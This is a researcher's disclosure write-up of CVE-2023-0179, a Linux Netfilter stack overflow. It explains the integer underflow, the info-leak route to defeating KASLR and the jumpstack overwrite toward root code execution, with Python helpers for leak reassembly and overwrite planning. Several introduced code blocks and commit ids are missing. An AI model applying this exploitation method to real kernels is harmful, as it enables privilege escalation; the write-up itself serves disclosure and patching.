While auditing the Linux kernel (commit 1b929c02afd37871d5afb9d498426f83432e71c2), I found a buffer overflow vulnerability within the Netfilter subsystem, which has been assigned CVE-2023-0179.
CVE-2023-0179 is exploitable starting from commit
f6ae9f1 up to commit
Exploitation could leak both stack and heap addresses and, potentially, allow a Local Privilege Escalation to the root user via arbitrary code execution.
The vulnerability is a stack buffer overflow caused by an integer underflow inside the nft_payload_copy_vlan function, which is invoked by nft_payload expressions whenever a VLAN tag is present in the current skb.
The checks at (0) look for a second VLAN tag from the EtherType field and, if the offset falls between the first VLAN_ETH_HLEN bytes and VLAN_ETH_HLEN plus the size of another VLAN header, nftables also tries to process the second VLAN tag.
At (1) the if statement correctly checks the boundary of the header using the offset and len variables (8-bit unsigned ints), evaluating to true whenever offset + len exceeds the double-tagged VLAN header.
Evaluating the sum inline prevents any wrapping, because the u8 operands are promoted to int before the comparison.
However, on the next line, the result of the subtraction at (2) is stored back into ethlen (u8), so it is truncated to 8 bits and ethlen may wrap around to a value close to UINT8_MAX under certain conditions.
Some examples of vulnerable offset and len pairs are:
offset: 19, len: 4, ethlen = 251
offset: 16, len: 19, ethlen = 254
offset: 20, len: 32, ethlen = 250
Other pairs can be listed with the following algorithm:
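A minimal sketch of such an enumeration, written in Python as a model of the u8 arithmetic rather than as the kernel code itself. It assumes VLAN_HLEN = 4 and VLAN_ETH_HLEN = 18, and it assumes that vlan_hlen equals VLAN_HLEN for every offset (the check at (0) is not modelled), which is the condition under which the three pairs above are reproduced. The function names are hypothetical.

```python
VLAN_HLEN = 4        # size of one VLAN header (assumed kernel value)
VLAN_ETH_HLEN = 18   # Ethernet header plus one VLAN header (assumed kernel value)


def ethlen_after_subtraction(offset, length, vlan_hlen=VLAN_HLEN):
    """Model (1) and (2): return (ethlen as u8, wrapped?) or None if (2) is not reached."""
    limit = VLAN_ETH_HLEN + vlan_hlen
    if offset >= limit or offset + length <= limit:
        return None  # the subtraction at (2) is skipped
    # Computed in int, like the promoted C expression ...
    raw = length - (offset + length - VLAN_ETH_HLEN + vlan_hlen)
    # ... then truncated to 8 bits when stored back into the u8 ethlen.
    return raw & 0xFF, raw < 0


def underflowing_pairs(vlan_hlen=VLAN_HLEN):
    """List every (offset, len, ethlen) tuple whose subtraction wraps."""
    pairs = []
    for offset in range(256):
        for length in range(256):
            result = ethlen_after_subtraction(offset, length, vlan_hlen)
            if result is not None and result[1]:
                pairs.append((offset, length, result[0]))
    return pairs


if __name__ == "__main__":
    for offset, length, ethlen in underflowing_pairs():
        print(f"offset: {offset}, len: {length}, ethlen = {ethlen}")
```

Under these assumptions len cancels out of the expression and ethlen reduces to 14 - offset modulo 256, so every offset from 15 to 21 wraps as long as offset + len exceeds 22.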
Finally, at (3), up to 255 bytes are copied to the destination register, which is located on the stack, overwriting the adjacent memory.
Since we can control the destination register, we can pick NFT_REG32_15 to trigger a 251-byte OOB write on the stack (since NFT_REG32_15 occupies 4 bytes).
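The 251-byte figure can be reproduced with a rough model of the register file. The constants below (register ids, a 16-byte verdict area followed by sixteen 4-byte registers) are assumptions based on the nf_tables headers and should be checked against the audited tree; the helper names are hypothetical.

```python
NFT_REG32_00 = 8      # first 4-byte register id (assumed uapi value)
NFT_REG32_15 = 23     # last 4-byte register id (assumed uapi value)
NFT_REG_SIZE = 16     # bytes taken by the verdict at the start of the registers
NFT_REG32_SIZE = 4    # bytes per 32-bit register
NFT_REG32_NUM = 20    # total u32 slots: 4 for the verdict + 16 data registers


def reg32_byte_offset(reg):
    """Byte offset of a 32-bit register inside the register file."""
    if not NFT_REG32_00 <= reg <= NFT_REG32_15:
        raise ValueError("not a 32-bit register id")
    slot = reg + NFT_REG_SIZE // NFT_REG32_SIZE - NFT_REG32_00
    return slot * NFT_REG32_SIZE


def oob_bytes(reg, copy_len):
    """Bytes written past the end of the register file by a copy_len-byte memcpy."""
    room = NFT_REG32_NUM * NFT_REG32_SIZE - reg32_byte_offset(reg)
    return max(0, copy_len - room)


if __name__ == "__main__":
    print(oob_bytes(NFT_REG32_15, 255))
```

With the last register as destination only 4 bytes of room remain, so a 255-byte copy spills 251 bytes past the registers.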
The vulnerable code path can be reached if skb_vlan_tag_present(skb) evaluates to true, that is, if the skb->vlan_tci field is set. This is known to happen when the host is placed inside a VLAN, although a modified skb could also be forged manually, perhaps by crafting the packet itself or by using some other nft_expr that can edit packets.
The calling function is nft_payload_eval, which evaluates the Nftables expression:
At (0) dest is set to the chosen destination register, where the payload expression will store its result.
If the payload offset base is NFT_PAYLOAD_LL_HEADER (1) and a mac header is present, the vulnerable code path will be taken (2).
Furthermore, the kernel must be built with CONFIG_VLAN_8021Q enabled, and the attacker needs the CAP_NET_ADMIN capability, which can be obtained by entering a new user namespace beforehand.
Info leak: Exploitation details
The exploitation can be carried out in two ways:
The data leak is triggered by using NFT_REG32_00 as the destination register, which will fill the other registers with data from the stack.
To retrieve the leaked data from the registers, multiple techniques can be applied. I chose to create an nft_set, which stores values across multiple nft_do_chain routines. I then created 8 different nft_dynset expressions to index all the available registers and store their values inside the set.
Finally, the nft userspace utility can be used to retrieve the set content:
gdb will help reassemble the addresses:
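The same reassembly can also be scripted. The sketch below assumes the set dump has already been parsed into a list of 32-bit integers in register order on a little-endian 64-bit target; the helper names and the sample values are hypothetical, not taken from a real dump.

```python
import struct


def regs_to_qwords(regs, byte_offset=0):
    """Join consecutive 32-bit register values into 64-bit little-endian words.

    byte_offset skips leading bytes when the leaked pointers are not aligned
    with the first register.
    """
    raw = struct.pack("<%dI" % len(regs), *regs)
    usable = (len(raw) - byte_offset) // 8
    return list(struct.unpack_from("<%dQ" % usable, raw, byte_offset))


def kaslr_slide(leaked_ptr, unslid_ptr):
    """Slide = leaked runtime address minus the same symbol's address without KASLR."""
    return leaked_ptr - unslid_ptr


if __name__ == "__main__":
    # Hypothetical register contents: low half first, then high half.
    sample = [0x92345678, 0xFFFFFFFF]
    leaked = regs_to_qwords(sample)[0]
    print(hex(leaked), hex(kaslr_slide(leaked, 0xFFFFFFFF81345678)))
```

Once a kernel text pointer has been recovered this way, subtracting the address the same symbol has in a non-randomized build yields the slide.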
All the highlighted addresses can be derived from the userspace set dump and can be used to calculate the KASLR slide. The following PoC code can be used to reach this condition:
Code execution: Initial exploitation details
The second way to exploit this vulnerability involves overwriting most of the jumpstack array, which gets allocated right next to the registers in nft_do_chain, with controlled data (
The register's content is also included in the OOB write, allowing us to overwrite the jumpstack with arbitrary rules and chains.
By repeatedly jumping to another chain, the stackptr variable gets incremented (0) until the jumpstack entry that will end up containing our addresses has been reached. The last chain then triggers the overflow, effectively replacing the jumpstack content and setting the verdict to NFT_CONTINUE.
This verdict allows us to break from the switch statement and reach (1).
At this point, the last_rule variables will be overwritten with our controlled data (2).
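To get a feel for how far the write reaches, the following sketch estimates which jumpstack entries a given OOB length fully covers and how many jumps are needed before a given entry is the one restored. It rests on several assumptions: 16 entries of three 8-byte pointers each, a hypothetical gap parameter for any padding between the registers and jumpstack[0], and stackptr being incremented once per jump and decremented before an entry is read back.

```python
JUMPSTACK_ENTRIES = 16   # assumed NFT_JUMP_STACK_SIZE
ENTRY_SIZE = 24          # assumed: three 8-byte pointers per entry on x86-64


def overwritten_entries(oob_len, gap=0):
    """Indices of jumpstack entries fully covered by the OOB write.

    oob_len: bytes written past the end of the registers.
    gap: hypothetical padding between the registers and jumpstack[0].
    """
    covered = []
    for idx in range(JUMPSTACK_ENTRIES):
        start = gap + idx * ENTRY_SIZE
        if start + ENTRY_SIZE <= oob_len:
            covered.append(idx)
    return covered


def jumps_needed(target_idx):
    """Jumps required so that returning from the last chain pops entry target_idx."""
    return target_idx + 1


if __name__ == "__main__":
    entries = overwritten_entries(251)
    print(entries, jumps_needed(entries[-1]))
```

The real layout depends on the compiler and kernel configuration, so the gap has to be confirmed in a debugger before relying on any of these indices.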
The security issue is that, if the rule points to a well-formed expression that can be dereferenced, the expr_call_ops_eval function will be called on that expression, effectively evaluating it:
The following PoC code replicates this scenario and triggers a protection fault when dereferencing our rule pointer:
Here is the jumpstack before evaluating the last chain:
and this is the jumpstack after the last chain:
Notice how the rule at (0) will be evaluated next, leading to the following panic:
For debugging purposes, the VLAN tag can be manually set with the following gdb hook after breaking at
Since the vulnerable operation in nft_payload_copy_vlan should account for the encapsulated VLAN tag, I suspect that the last plus sign should have been a minus, which would prevent any wrapping.
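The effect of flipping that sign can be checked with a small brute-force model. This is a sketch of the arithmetic only, assuming VLAN_HLEN = 4 and VLAN_ETH_HLEN = 18 and treating vlan_hlen as a free parameter; the function names are hypothetical and the code is not the patch itself.

```python
VLAN_HLEN = 4        # assumed kernel value
VLAN_ETH_HLEN = 18   # assumed kernel value


def raw_ethlen(offset, length, vlan_hlen, minus):
    """ethlen before truncation to u8, with '+ vlan_hlen' or '- vlan_hlen'."""
    sign = -1 if minus else 1
    return length - (offset + length - VLAN_ETH_HLEN + sign * vlan_hlen)


def wrapping_pairs(minus, vlan_hlen=VLAN_HLEN):
    """All (offset, len) pairs that pass the check at (1) and go negative at (2)."""
    limit = VLAN_ETH_HLEN + vlan_hlen
    return [
        (offset, length)
        for offset in range(limit)
        for length in range(256)
        if offset + length > limit
        and raw_ethlen(offset, length, vlan_hlen, minus) < 0
    ]


if __name__ == "__main__":
    print(len(wrapping_pairs(minus=False)), len(wrapping_pairs(minus=True)))
```

With the minus sign the expression simplifies to VLAN_ETH_HLEN + vlan_hlen - offset, which is always positive inside the enclosing offset check and smaller than len, so no pair wraps.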
I, therefore, proposed the following patch, which has been applied in commit
Mitigating the bug
If you are unable to patch this bug, disabling unprivileged user namespaces will prevent exploitation:
I will be providing the full Proof of Concept on my Github repo in the next few days.
Proof of Concept: https://github.com/TurtleARM/CVE-2023-0179-PoC
David Bouman's article on Nftables and his PoC on Github, which my code is heavily based on: https://blog.dbouman.nl/2022/04/02/How-The-Tables-Have-Turned-CVE-2022-1015-1016